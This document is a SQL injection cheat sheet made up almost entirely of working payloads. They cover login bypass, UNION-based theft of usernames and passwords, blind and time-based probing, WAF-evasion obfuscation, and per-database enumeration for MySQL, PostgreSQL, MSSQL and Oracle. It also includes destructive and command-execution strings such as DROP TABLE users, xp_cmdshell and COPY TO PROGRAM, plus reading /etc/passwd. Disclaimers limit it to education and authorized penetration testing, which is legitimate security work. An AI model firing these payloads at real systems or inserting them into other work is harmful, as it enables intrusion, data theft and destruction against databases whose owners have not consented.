
SQL Injection Cheat Sheet
Basic SQL Injection
' OR '1'='1
' OR 1=1 --
" OR 1=1 --
' OR 'a'='a
') OR ('1'='1
Authentication Bypass
' OR '1'='1' --
' OR '1'='1' /*
' OR 1=1#
admin' --
UNION-Based SQL Injection
Find column count:
' ORDER BY 1--
' ORDER BY 2--
Using UNION:
' UNION SELECT null, null --
' UNION SELECT 1,2,3 --
' UNION SELECT username, password FROM users --
Error-Based SQL Injection
' AND 1=CONVERT(int, (SELECT @@version)) --
' AND 1=CAST((SELECT user()) AS int) --
Blind SQL Injection
' AND 1=1 -- (True)
' AND 1=2 -- (False)
' AND substring(@@version,1,1)='5' --
' AND ASCII(SUBSTRING((SELECT database()),1,1))=100 --
⏱️ Time-Based Blind SQL Injection
' OR IF(1=1, SLEEP(5), 0) -- (MySQL)
'; IF (1=1) WAITFOR DELAY '0:0:5'-- (MSSQL)
WAF Bypass & Obfuscation
%27 OR %271%27=%271 (URL encoded)
'/**/OR/**/'1'='1
' OR 1=1-- -
')/**/OR/**/(1=1)--
UN/**/ION SEL/**/ECT
Extracting Data
' UNION SELECT table_name, null FROM information_schema.tables --
' UNION SELECT column_name, null FROM information_schema.columns WHERE table_name='users' --
' UNION SELECT username, password FROM users --
Useful Functions (MySQL)
database()
version()
user()
@@datadir
LOAD_FILE('/etc/passwd')
INFORMATION_SCHEMA.TABLES
MySQL Comments & Tricks
-- (Comment)
# (Comment)
/* comment */
' /*!UNION*/ SELECT
Stacked Queries (MSSQL)
'; DROP TABLE users --
'; EXEC xp_cmdshell('whoami') --
Bypass Filters
'OR'1'='1
'||(SELECT 1)=1
' AND CHAR(124)+CHAR(124)+(SELECT 1)=1
Disclaimer
This cheat sheet is intended for educational purposes, penetration testing in authorized environments, and improving application security. Do not use these techniques on systems without explicit permission.
SQL Injection Cheat Sheet by DBMS
Note: Syntax may vary depending on the database. Always tailor payloads to the specific backend.
MySQL
- Version:
SELECT @@version;
- Current User:
SELECT user();
- Current DB:
SELECT database();
- List DBs:
SELECT schema_name FROM information_schema.schemata;
- List Tables:
SELECT table_name FROM information_schema.tables WHERE table_schema='target_db';
- List Columns:
SELECT column_name FROM information_schema.columns WHERE table_name='target_table';
- Read File:
SELECT LOAD_FILE('/etc/passwd');
- Time Delay:
SLEEP(5)
- Comment Syntax:
--, #, /* */
PostgreSQL
- Version:
SELECT version();
- Current User:
SELECT current_user;
- Current DB:
SELECT current_database();
- List Tables:
SELECT table_name FROM information_schema.tables WHERE table_schema='public';
- List Columns:
SELECT column_name FROM information_schema.columns WHERE table_name='target_table';
- Time Delay:
pg_sleep(5);
- Command Execution (with permissions):
COPY (SELECT '') TO PROGRAM 'id';
- Comment Syntax:
--
Microsoft SQL Server
- Version:
SELECT @@version;
- Current User:
SELECT SYSTEM_USER;
- Current DB:
SELECT DB_NAME();
- List DBs:
SELECT name FROM master..sysdatabases;
- List Tables:
SELECT name FROM sysobjects WHERE xtype='U';
- Command Execution:
EXEC xp_cmdshell 'whoami';
- Time Delay:
WAITFOR DELAY '0:0:5';
- Comment Syntax:
--, /* */
Oracle
- Version:
SELECT * FROM v$version;
- Current User:
SELECT user FROM dual;
- Current DB:
SELECT ora_database_name FROM dual;
- List Tables:
SELECT table_name FROM all_tables;
- List Columns:
SELECT column_name FROM all_tab_columns WHERE table_name='TARGET_TABLE';
- Time Delay:
DBMS_LOCK.SLEEP(5);
- Command Execution:
Java procedures or external tables (if configured)
- Comment Syntax:
--, /* */
Generic Injection Payloads
' OR '1'='1 --
' OR 1=1 --
' UNION SELECT null,null --
' AND 1=0 UNION SELECT username, password FROM users --
Filter Bypass Tricks
'/**/OR/**/'1'='1
UNION%0ASELECT
' OR 1=1-- -
CHAR(97)+CHAR(98)+CHAR(99) (for 'abc')
⚠️ Disclaimer
This content is for educational and authorized penetration testing only. Do not attempt to exploit systems without proper legal consent.